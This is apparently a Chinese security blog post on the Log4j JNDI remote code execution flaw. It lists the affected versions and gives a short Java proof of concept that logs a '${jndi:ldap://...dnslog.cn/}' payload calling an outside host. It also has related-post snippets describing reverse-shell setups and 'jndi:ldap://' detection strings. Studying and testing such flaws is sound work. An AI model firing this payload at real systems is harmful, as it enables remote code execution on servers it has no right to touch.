Log4j远程代码执行

已于 2022-03-01 15:58:43 修改
阅读量1.5k 收藏 2
点赞数
文章标签: web安全 渗透测试 网络安全
于 2022-02-25 14:36:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzkaq/article/details/123132199
版权 
零基础学黑客,搜索公众号:白帽子左一

作者:掌控安全——holic

0x01、环境

Jdk7u21(随便版本都可以)

影响版本:

Apache Log4j 2.x
org.apache.logging.log4j
log4j-core
2.11.1

Poc

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class test2 {
   
    private static Logger LOGGER = LogManager.getLogger();
    public static void main(String[] args) {
   
        LOGGER.error("${jndi:ldap://ewa04i.dnslog.cn/}");
    }
}

0x02、分析

看payload,我们无可厚非去搜索log4j lookup或者log4j jndi

https://logging.apache.org/

最低0.47元/天 解锁文章
zkzq
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Log4j远程代码执行漏洞复现尝试
weixin_51194266的博客
06-29 616
log4j漏洞的简单复现
解决Apache Log4j 远程代码执行漏洞log4j2部分jar
12-10
解决Apache Log4j 远程代码执行漏洞log4j2部分jar,包含log4j-1.2-api-2.15.0.jar,log4j-api-2.15.0.jar,log4j-core-2.15.0.jar,log4j-to-slf4j-2.15.0.jar
Java代码审计——apache log4j 远程命令执行(CVE-2021-44228)
王嘟嘟的博客
12-13 1848
0x00 前言 反序列化总纲 本来是快乐游戏时间的,但是突然就出来这个洞了= =,当然这个突然用的比较夸张了,修复时间应该是在五天前了。 本着学习的态度来进行一下简单的分析。 0x01 环境 首先是pom <dependencies> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>lo
封神台Apache Log4j任意代码执行复现踩坑到复现成功版
最新发布
JACKBREAK的博客
05-19 822
log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2是log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详的公司的系统都在使用该框架。Apache Log4j2 组件在开启了日志记录功能后,凡是在可触发错误记录日志的地方,插入漏洞利用代码,即可利用成功。特殊情况下,若该组件记录的日志包含其他系统的记录日志,则有可能造成间接投毒。通过中间系统,使得组件间接读取了具有攻击性的漏洞利用代码,亦可间接造成漏洞触发。
log4j远程代码执行(CVE-2024-44228),2024年最新掌握了这些Linux运维高级工程师必备知识
e846815793的博客
04-10 672
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
网络安全深入学习第四课——热门框架漏洞(RCE— Log4j2远程代码执行
p36273的博客
09-16 1132
上面第2、3、4、5步都是在攻击者端操作,只有第6步是在普通前端操作。上面一共开启了3个端口,分别是80、1234、9999。这分别对应的是:web服务、接收反弹shell的、ldap服务。------ Log4j2漏洞总的来说就是:因为Log4j2默认支持解析ldap/rmi协议(只要打印的日志中包括ldap/rmi协议即可),并会通过名称从ldap服务端其获取对应的Class文件,并使用ClassLoader在本地加载Ldap服务端返回的Class类。
Log4j远程代码执行漏洞
weilaona的博客
12-17 1046
Log4j远程代码执行漏洞 12 月 10 日凌晨,Apache 开源项目 Log4j远程代码执行漏洞细节被公开,由于 Log4j 的广泛使用,该漏洞一旦被攻击者利用会造成严重危害。受本次漏洞影响的版本范围为 Apache Log4j 2.x < 2.15.0-rc2,攻击者可以利用此漏洞在目标服务器上执行任意代码,通过 JNDI 来执行 LDAP 协议来注入一些非法的可执行代码。 攻击检测 (1)可以通过检查日志中是否存在 “jndi:ldap://”、“jndi:rmi” 等字符来发现可能
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Apache Log4j 是一个广泛使用的 Java 日志框架,它允许应用...总之,Apache Log4j 远程代码执行漏洞是一个重大安全事件,强调了在软件开发和运维过程中对安全性的重视。及时更新和维护软件库是防止此类漏洞影响的关键。
Apache Log4j2 远程代码执行漏洞检测工具
12-15
针对这个漏洞,开发出了专门的Apache Log4j2远程代码执行漏洞检测工具,这些工具包括针对Windows和Linux操作系统的版本。这些工具的主要目的是帮助管理员和安全专家迅速识别其环境中是否存在易受攻击的Log4j2实例。 ...
log4j远程执行漏洞,测试源码
12-22
3. **多种协议支持**:除了LDAP和RMI,Log4j还支持其他协议,如JMS、JDBC等,这意味着攻击者有更多方式来触发远程代码执行。 **应对措施与修复** 为防范Log4j漏洞,开发者和管理员可以采取以下措施: 1. **升级到...
logging-log4j2-log4j-2.15.0-rc2.zip maven 资源库
12-31
针对Log4j 2 远程代码执行漏洞,需要用到的升级资源包,适用于maven资源库,包括log4jlog4j-core,log4j-api,log4j-1.2-api,log4j-jpa等全套2.15.0 maven资源库jar包。如果是maven本地仓库使用,需要将zip包解压到maven资源库的/org/apache/logging/log4jlog4j严重漏洞 log4j logging-log4j2-log4j-2.15.0-rc2 log4j-1.2-api-2.15.0.jar log4j-api-2.15.0.jar log4j-core-2.15.0.jar log4j-slf4j-impl-2.15.0.jar log4j-web-2.15.0.jar
Apache存在Log4j远程代码执行漏洞,严重危险级别
Mr、温少的博客
12-20 531
Apache存在Log4j远程代码执行漏洞,严重危险级别! 文章目录Apache存在Log4j远程代码执行漏洞,严重危险级别! 漏洞简述 2021-12-09,近期一个 Apache Log4j 远程代码执行漏洞细节被公开,攻击者利用漏洞可以远程执行代码。 如果你的系统日志使用log4j实现,且版本大于 2.0, 日志打印内容中包含关键字 ${}, 其包含的内容会当做变量来进行替换,导致攻击者可以任意执行命令。(问题出在:1og4j-core.jar) 影响范围 Apache Log4j2 是一款优秀的
log4j反序列化远程命令执行以及个人原理理解
weixin_46626737的博客
08-11 302
目录服务是一个特殊的数据库,用来保存描述性的、基于属性的详细信息,支持过滤功能。${jndi:ldap:x.x.x.x/test.class},通过构造的这条恶意函数,发送到log4j,打印到日志中,开始解析{}中的内容,发现是ldap实现的jndi,然后调用lookup。功能去查找x.x.x.x/test.class该文件,然后发现是远程服务器的文件,需要通过codebase去下载该class类,然后下载后,对该class文件进行使用默认的构造器。类似于上一个漏洞的原理。
使用 Log4j 将日志记录到远程系统
java、c++、机器学习方向King
05-16 594
https://coyee.com/article/12131-direct-logs-to-remote-system-with-log4j?utm_source=tuicool&utm_medium=referral 使用logstash分布式日志架构也可以,或者使用下面的方法 日志是在程序开发中最为重要的信息。日志为我们提供程序执行的行为记录。 Log4j 是 Java 程序里
log4j2远程代码执行漏洞原理及复现
m0_57967573的博客
04-29 1429
log4j2 框架下的 lookup 查询服务提供了 {} 字段解析功能,传进去的值会被直接解析。例如 ${java:version} 会被替换为对应的 java 版本。这样如果不对 lookup 的出栈进行限制,就有可能让查询指向任何服务
Log4j2.x 远程代码执行漏洞对线上项目(Log4j2.x)有影响吗?
詹Sir的博客
12-24 2150
突然,用户一封邮件袭击而来。只知道Log4j问题大了,也没去想自己的项目有没有影响。这下不得不去校验一番了。 执行测试代码如下: /** * @Description Log4J 漏洞测试 * @Author 开源字节 */ public class Log4jTest { private static final Logger logger = LogManager.getLogger(Log4jTest.class); public static void main(
Log4j远程代码执行漏洞
派大星的博客
09-21 2533
Log4j远程执行漏洞原理分析
Log4j拿到当前执行语句的实现
走自己的路
05-20 920
LoggingEvent中的 public LocationInfo getLocationInformation() { if(locationInfo == null) { locationInfo = new LocationInfo(new Throwable(), fqnOfCategoryClass); } return locatio
log4j远程代码执行漏洞
06-01
log4j远程代码执行漏洞是一种安全漏洞,可以允许攻击者远程执行恶意代码。该漏洞影响Apache软件基金会的Java日志库Log4j 2.x版本,并由于其被广泛使用而引起了广泛的关注。 攻击者可以通过精心构造的日志消息来触发...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值